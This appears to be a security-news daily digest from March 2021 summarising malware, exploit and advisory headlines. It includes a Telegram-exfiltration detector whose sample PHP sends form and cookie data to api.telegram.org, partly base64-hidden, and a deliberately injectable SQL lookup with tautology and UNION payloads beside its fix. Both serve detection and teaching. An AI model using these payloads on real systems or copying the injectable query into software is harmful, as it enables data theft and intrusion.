Daily Summary - 18.03.2021

End-of-Day report

Timeframe: Wednesday 17-03-2021 18:00 - Thursday 18-03-2021 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter


UK Foreign, Commonwealth & Development Office funds Shadowserver surge in Africa and Indo-Pacific regions

Can you help Shadowserver sign up more countries/networks in Africa and the Indo-Pacific to receive our free daily network reports and help secure the Internet? We are running a UK FCDO funded surge in Feb/March 2021, aimed at increasing outreach and expanding our honeypot sensor network in those regions. We are seeking introductions, contacts and hosting, so please get in touch if you can help us achieve these goals.


SolarWinds-linked hacking group SilverFish abuses enterprise victims for sandbox tests

Existing victim networks are used to test out payloads as a novel form of sandbox.


TTP Table for Detecting APT Activity Related to SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures (TTPs) used by the advanced persistent threat (APT) actor involved with the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify APT TTPs and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.


~4,300 publicly reachable servers are posing a new DDoS hazard to the Internet

DDoS-for-hire services adopt new technique that amplifies attacks 37 fold.


New XcodeSpy malware targets iOS devs in supply-chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply-chain attack to install a macOS backdoor on the developer's computer.


Convuster: macOS adware now in Rust

Convuster adware for macOS is written in Rust and able to use Gatekeeper to evade analysis.


Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows & Linux

Back in January, we blogged about a new botnet, Necro, and shortly after our report it stopped spreading. On March 2nd, the BotMon system detected that Necro had started spreading again, [...]


Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog is the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware at the server level can be used for data exfiltration. What's more, attackers may be able to accomplish this feat with a few mere lines of code.
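The exfiltration the post describes needs only one outbound call to the Telegram Bot API, which makes the API host and the bot token shape a usable indicator on the web server itself. Below is an added example (not code from the blog post) that scans PHP source for `api.telegram.org/bot<token>/<method>` calls, including ones hidden one level deep in base64 strings, and reports the bot id and method while redacting the secret. The sample PHP is constructed here for the demo; the token values and the `-100111` chat id are invented.

```python
import base64
import os
import re
from typing import Dict, Iterator, List, Tuple

# Telegram bot tokens have the documented shape "<numeric bot id>:<35-char secret>".
TOKEN_RE = r"\d{6,12}:[A-Za-z0-9_-]{35}"
# A direct Bot API call: api.telegram.org/bot<token>/<method>
API_CALL_RE = re.compile(
    r"api\.telegram\.org/bot(?P<token>" + TOKEN_RE + r")/(?P<method>[A-Za-z]+)"
)
# Long base64-looking runs, which skimmers use to hide the API host in source.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _findings_in_text(text: str, origin: str) -> List[Dict[str, str]]:
    """Collect Bot API calls in `text`; only the bot id is kept, never the secret."""
    found = []
    for m in API_CALL_RE.finditer(text):
        bot_id = m.group("token").split(":")[0]
        found.append({"origin": origin, "bot_id": bot_id, "method": m.group("method")})
    return found


def scan_source(text: str) -> List[Dict[str, str]]:
    """Return Telegram Bot API usages in one source file, plain or base64-hidden."""
    findings = _findings_in_text(text, "plain")
    for run in B64_RUN_RE.findall(text):
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 (binascii.Error is a ValueError)
            continue
        findings.extend(_findings_in_text(decoded, "base64"))
    return findings


def scan_directory(root: str, exts: Tuple[str, ...] = (".php",)) -> Iterator[Tuple[str, List[Dict[str, str]]]]:
    """Walk a web root and yield (path, findings) for every file with a hit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    yield path, hits


# --- constructed sample (hypothetical backdoored PHP, built here for the demo) ---
_HIDDEN_URL = (
    "https://api.telegram.org/bot987654321:BBGkQm3Zr_x9LwT2pNvC8dY5hJ1sF0aKeRu/sendDocument"
)
_B64_URL = base64.b64encode(_HIDDEN_URL.encode()).decode()
SAMPLE_PHP = (
    "<?php\n"
    "$d = json_encode($_POST);\n"
    '@file_get_contents("https://api.telegram.org/bot123456789:AAHfiqksKZ8WmR2zSjiQ7_v4TBAAgqLGrzE'
    '/sendMessage?chat_id=-100111&text=" . urlencode($d));\n'
    '$u = base64_decode("' + _B64_URL + '");\n'
    '@file_get_contents($u . "?chat_id=-100111&text=" . urlencode(json_encode($_COOKIE)));\n'
)

if __name__ == "__main__":
    for hit in scan_source(SAMPLE_PHP):
        print(hit)
```

Run `scan_directory("/var/www")` on a suspect host; a hit in a theme or plugin file that has no business talking to Telegram is worth a closer look, and the bot id alone is enough to pivot on without copying the secret into a ticket.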


Simple Python Keylogger

A keylogger is one of the core features implemented by many malware families to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if it's a juicy one or not.


Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability

On Feb. 20, 2021, Unit 42 researchers observed attempts to exploit CVE-2020-9020, which is a Remote Command Execution (RCE) vulnerability in Iteris' Vantage Velocity field unit versions 2.3.1, 2.4.2 and 3.0. As a travel data measurement system, Vantage Velocity captures travel data from a large number of vehicles. If a device is compromised, [...]


NimzaLoader Malware

NimzaLoader is a new initial access malware that is relatively unique in its usage of the Nim programming language. Proofpoint observed this malware being distributed in a TA800 email campaign in place of BazaLoader.



SYSS-2020-044: Security issue in the screen sharing functionality of Zoom (CVE-2021-28133)

A SySS proof-of-concept video demonstrates a security issue in the screen sharing function of the Zoom video conferencing software.


Tutor LMS for WordPress Open to Info-Stealing Security Holes

The popular learning-management system for teacher-student communication is rife with SQL-injection vulnerabilities.


Critical RCE Flaw Reported in MyBB Forum Software: Patch Your Sites

A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account. The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an [...]


ZDI-21-337: Hewlett Packard Enterprise Network Orchestrator uaf-token SQL Injection Information Disclosure Vulnerability

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Network Orchestrator. Authentication is not required to exploit this vulnerability.
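Both the Tutor LMS entry above and this HPE advisory are SQL injection, and the HPE case is the unauthenticated information-disclosure variant: a single user-controlled value (the `uaf-token` parameter) reaches a query unparameterized. The following added example (not vendor code; the `sessions` schema and token values are invented) shows the bug pattern next to its fix with SQLite, and demonstrates why an unauthenticated attacker gets disclosure: a boolean tautology returns every row, and a UNION pulls out schema metadata, while the parameterized version treats the same payloads as literal, non-matching tokens.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a token-to-session table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE sessions (token TEXT, username TEXT, role TEXT);"
        "INSERT INTO sessions VALUES ('tok-aaa', 'alice', 'user');"
        "INSERT INTO sessions VALUES ('tok-bbb', 'admin', 'admin');"
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, token: str) -> List[Tuple[str, str]]:
    """Deliberately vulnerable: the token is concatenated into the SQL text,
    so quote characters in it become SQL syntax."""
    sql = "SELECT username, role FROM sessions WHERE token = '" + token + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, token: str) -> List[Tuple[str, str]]:
    """Fixed: the token is bound as a parameter and can never change the query shape."""
    return conn.execute(
        "SELECT username, role FROM sessions WHERE token = ?", (token,)
    ).fetchall()


# Two classic unauthenticated payloads (constructed for the demo).
TAUTOLOGY = "' OR '1'='1"                                   # returns every session
SCHEMA_DUMP = "x' UNION SELECT name, sql FROM sqlite_master --"  # leaks table definitions

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology :", lookup_vulnerable(db, TAUTOLOGY))
    print("vulnerable, schema    :", lookup_vulnerable(db, SCHEMA_DUMP))
    print("safe, tautology       :", lookup_safe(db, TAUTOLOGY))
    print("safe, real token      :", lookup_safe(db, "tok-aaa"))
```

The trailing `--` in the UNION payload comments out the closing quote the application appends, which is why the injected query parses cleanly; with parameter binding the whole string is just a token value that matches nothing.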


ZDI-21-341: (0Day) (Pwn2Own) Sony X800H Smart TV Vewd Type-Confusion Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sony X800H Smart TV. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.


Security updates for Thursday

Security updates have been issued by Debian (velocity-tools), Fedora (switchboard-plug-bluetooth), Mageia (discover, flatpak, and xmlgraphics-commons), openSUSE (chromium and python), Oracle (kernel, kernel-container, and pki-core), Red Hat (openvswitch2.11 and ovn2.11, python-django, qemu-kvm-rhev, and rubygem-em-http-request), and SUSE (crmsh, openssl1, and php53).


Xen: Vulnerability allows denial of service


Drupal: Vulnerability allows disclosure of information


Security Bulletin: z/TPF is affected by OpenSSL vulnerabilities


Security Bulletin: March 2021 : Vulnerability in IBM Java Runtime affects CICS Transaction Gateway


Security Bulletin: March 2021 : Vulnerability in IBM Java Runtime affects CICS Transaction Gateway


Security Bulletin: IBM RackSwitch firmware products are affected by vulnerabilities in Libxml2


Security Bulletin: IBM RackSwitch firmware products are affected by a vulnerability in libcurl (CVE-2019-5436)


Security Bulletin: IBM Security Guardium External S-TAP is affected by an Execution with Unnecessary Privileges vulnerability


Security Bulletin: IBM Flex System switch firmware products are affected by a vulnerability in libcurl (CVE-2019-5436)


Security Bulletin: March 2021 : Multiple vulnerabilities in IBM Java Runtime affect CICS Transaction Gateway


Security Bulletin: A vulnerability in IBM SDK, Java Technology Edition affects IBM Spectrum Scale


Security Bulletin: IBM Resilient vulnerable to username enumeration (CVE-2020-4635)